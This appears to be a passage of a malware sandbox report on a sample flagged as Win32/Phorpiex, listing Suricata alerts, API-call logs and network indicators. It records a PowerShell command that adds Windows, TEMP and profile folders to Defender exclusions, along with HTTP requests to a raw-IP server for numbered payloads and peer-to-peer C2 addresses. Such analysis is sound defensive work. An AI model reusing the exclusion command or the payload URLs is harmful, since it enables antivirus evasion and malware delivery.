TCP 67.195.204.75:25 -> 192.168.56.103:49915 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49926 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
UDP 192.168.56.103:59146 -> 194.93.26.210:40500 2044077 ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC A Network Trojan was detected
TCP 144.160.159.21:25 -> 192.168.56.103:50226 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49934 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50241 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50255 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50242 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50265 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50253 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50285 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50315 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50321 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50403 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50408 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.80:25 -> 192.168.56.103:50404 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50276 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50281 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50303 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50372 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
UDP 192.168.56.103:59146 -> 217.30.160.154:40500 2044077 ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC A Network Trojan was detected
TCP 67.195.204.75:25 -> 192.168.56.103:49940 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49945 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49947 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49967 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49998 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50001 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50012 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50004 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50015 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50016 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50025 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50026 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50030 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
UDP 192.168.56.103:59146 -> 77.221.27.219:40500 2044077 ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC A Network Trojan was detected
TCP 67.195.204.75:25 -> 192.168.56.103:50051 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50089 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50128 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50125 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50139 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50140 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50151 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50165 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50179 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50278 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50292 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50322 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50141 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50210 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50216 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50224 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50293 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50294 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50314 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50325 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50330 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50338 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50339 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50353 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50358 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50364 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50375 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50381 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50410 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50143 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50335 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50146 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50148 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50344 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50159 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50357 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50161 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50359 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50166 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50377 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50378 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50177 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50399 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50180 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50182 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50183 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50199 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50208 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50218 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50222 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50225 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50230 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50239 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50243 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50249 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50260 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50288 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50305 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50317 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50320 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50337 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50347 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
UDP 192.168.56.103:59146 -> 195.158.22.13:40500 2044077 ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC A Network Trojan was detected
TCP 144.160.159.21:25 -> 192.168.56.103:50355 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.80:25 -> 192.168.56.103:50354 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50376 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.80:25 -> 192.168.56.103:50395 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 192.168.56.103:50418 -> 144.160.159.21:25 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 192.168.56.103:50416 -> 144.160.235.143:25 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: , script file, or operable program. Check the spelling of the name, or if a pat
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: h was included, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:1 char:17
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + Add-MpPreference <<<< -ExclusionPath $env:windir; Add-MpPreference -Exclusio
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: nPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: mmandNotFoundException
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle: 0x000000a3
1 1 0

WriteConsoleW

 buffer: , script file, or operable program. Check the spelling of the name, or if a pat
console_handle: 0x000000af
1 1 0

WriteConsoleW

 buffer: h was included, verify that the path is correct and try again.
console_handle: 0x000000bb
1 1 0

WriteConsoleW

 buffer: At line:1 char:62
console_handle: 0x000000c7
1 1 0

WriteConsoleW

 buffer: + Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference <<<< -Exclusio
console_handle: 0x000000d3
1 1 0

WriteConsoleW

 buffer: nPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE
console_handle: 0x000000df
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
console_handle: 0x000000eb
1 1 0

WriteConsoleW

 buffer: mmandNotFoundException
console_handle: 0x000000f7
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000103
1 1 0

WriteConsoleW

 buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle: 0x00000123
1 1 0

WriteConsoleW

 buffer: , script file, or operable program. Check the spelling of the name, or if a pat
console_handle: 0x0000012f
1 1 0

WriteConsoleW

 buffer: h was included, verify that the path is correct and try again.
console_handle: 0x0000013b
1 1 0

WriteConsoleW

 buffer: At line:1 char:105
console_handle: 0x00000147
1 1 0

WriteConsoleW

 buffer: + Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath
console_handle: 0x00000153
1 1 0

WriteConsoleW

 buffer: $env:TEMP; Add-MpPreference <<<< -ExclusionPath $env:USERPROFILE
console_handle: 0x0000015f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
console_handle: 0x0000016b
1 1 0

WriteConsoleW

 buffer: mmandNotFoundException
console_handle: 0x00000177
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000183
1 1 0

WriteConsoleW

 buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: [SC] ControlService FAILED 1062: The service has not been started.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: [SC] ControlService FAILED 1062: The service has not been started.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041dfe8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e5a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e5a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e5a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041dd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041dd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041dd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041dd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041dd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041dd28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e5a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e5a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e5a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e1a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041ea28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e4a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e4a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e4a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e4a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e4a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e4a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e4a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0041e4a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.66/1
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.66/ns/n.txt
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.66/2
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.66/ns/91.txt
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.66/3
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.66/4
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.66/5
request GET http://185.215.113.66/1
request GET http://icanhazip.com/
request GET http://185.215.113.66/ns/n.txt
request GET http://185.215.113.66/2
request GET http://185.215.113.66/ns/91.txt
request GET http://185.215.113.66/3
request GET http://185.215.113.66/4
request GET http://185.215.113.66/5
ip 109.74.35.21
ip 109.74.43.21
ip 194.93.26.210
ip 195.158.22.13
ip 2.185.163.114
ip 213.230.90.222
ip 217.30.160.154
ip 5.238.186.28
ip 77.221.27.219
ip 78.85.106.173
ip 95.58.72.245
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 2031616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02850000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2276
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0242a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2276
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02422000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02432000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02433000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02434000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
